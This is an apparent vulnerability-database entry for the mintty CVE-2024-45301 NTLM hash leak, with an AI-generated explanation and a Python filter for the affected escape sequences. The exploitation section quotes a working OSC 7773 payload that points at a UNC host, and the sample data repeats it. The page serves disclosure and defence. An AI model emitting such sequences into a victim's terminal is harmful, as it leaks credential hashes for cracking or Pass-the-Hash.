CVE-2024-45301
Description
Mintty is a terminal emulator for Cygwin, MSYS, and WSL. In versions 2.3.6 through 3.7.4, several escape sequences can cause the mintty process to access a file in a specific path. It is triggered by simply printing them out on bash. An attacker can specify an arbitrary network path and negotiate an NTLM hash out of the victim's machine to an attacker-controlled remote host. An attacker can use password cracking tools or NetNTLMv2 hashes to Pass the Hash. Version 3.7.5 fixes the issue.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Mintty 2.3.6–3.7.4 allows NTLM hash disclosure via crafted escape sequences that trigger path conversion to an attacker-controlled network share.
Vulnerability Overview
Mintty, a terminal emulator for Cygwin, MSYS2, and WSL, contains a vulnerability in its path conversion logic. Several escape sequences (including OSC 7773, OSC 440, OSC 11, OSC 7, and OSC 8) cause the mintty process to access a file at a specified path. The root cause is the use of an MSYS2 API that converts between POSIX and Windows paths and also checks for symbolic links, which triggers a network file access when an attacker-controlled UNC path is supplied [1].
Exploitation
An attacker can exploit this by simply printing a crafted escape sequence in a bash shell, for example \x1b]7773;//0.0.0.0/test\007. The victim does not need to click or interact further; merely displaying the sequence is sufficient. The mintty process then attempts to resolve the path, which causes the Windows operating system to negotiate an NTLM authentication with the attacker's remote host. This works because the path conversion API calls cygwin_conv_path and eventually path_conv::check, which invokes Windows APIs that connect to the specified network share [1].
Impact
A successful attack leaks the victim's NetNTLMv2 hash to the attacker. This hash can be used offline for password cracking with tools like hashcat or John the Ripper, or in a Pass-the-Hash attack to impersonate the victim on the network. The CVSS score is 5.3 (Medium), with high confidentiality impact but requiring user interaction (the victim must run a command that prints the escape sequence) and high attack complexity [1].
Mitigation
The vulnerability is fixed in Mintty version 3.7.5. Users should update to the latest version. No workarounds are documented, but avoiding untrusted input in terminal output can reduce risk. The same code path exists in Cygwin, which may also be theoretically vulnerable [1].
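One way to screen untrusted text for the sequences named above before it reaches a terminal, as an added example that is not code from mintty or from this advisory. The function names, the `local_hosts` parameter and the sample bytes are assumptions made for illustration, and the payload matching is a heuristic for `//host/` and `\\host\` forms, not mintty's own parser.

```python
import re

# OSC numbers named in the overview above as reaching mintty's path conversion.
PATH_OSC = {7, 8, 11, 440, 7773}

# ESC ] <number> ; <payload>, terminated by BEL or ST (ESC \).
OSC_RE = re.compile(rb"\x1b\](\d+);([^\x07\x1b]*)(?:\x07|\x1b\\)")

# //host/ or \\host\ with a non-empty host. A leading scheme is accepted only
# when it is file:, so file:///local/path and https://... links are not flagged.
NET_PATH_RE = re.compile(
    rb"(?:(?<![/\\:])|(?<=file:))(?://|\\\\)([^/\\;\s]+)[/\\]", re.IGNORECASE)


def find_network_path_osc(data, local_hosts=()):
    """Return [(osc_number, host)] for path-taking OSCs that name a remote host.

    local_hosts: names to ignore, e.g. the machine's own hostname, which
    shells legitimately report in OSC 7 as file://hostname/cwd.
    """
    local = {h.lower() for h in local_hosts}
    hits = []
    for osc in OSC_RE.finditer(data):
        number = int(osc.group(1))
        if number not in PATH_OSC:
            continue
        for path in NET_PATH_RE.finditer(osc.group(2)):
            host = path.group(1).decode("ascii", "replace").lower()
            if host not in local:
                hits.append((number, host))
    return hits


def strip_flagged(data, local_hosts=()):
    """Remove only the sequences find_network_path_osc flags; keep the rest."""
    def keep_or_drop(osc):
        return b"" if find_network_path_osc(osc.group(0), local_hosts) else osc.group(0)
    return OSC_RE.sub(keep_or_drop, data)


# Constructed sample: the sequence quoted on this page between benign ones.
SAMPLE = (b"build ok\n"
          b"\x1b]7773;//0.0.0.0/test\x07"
          b"\x1b]8;;https://example.com/doc\x1b\\link\x1b]8;;\x1b\\"
          b"\x1b]7;file://devbox/home/user\x07"
          b"\x1b]11;rgb:00/00/00\x07done\n")

if __name__ == "__main__":
    print(find_network_path_osc(SAMPLE, local_hosts=["devbox"]))
    print(strip_flagged(SAMPLE, local_hosts=["devbox"]))
```

Sequences that are never terminated are not matched by this filter, so it suits complete inputs such as files, logs or captured command output rather than a live byte stream.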
AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (2)
Patches (1)
2b585cc77fbf
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References (1)
News mentions (0)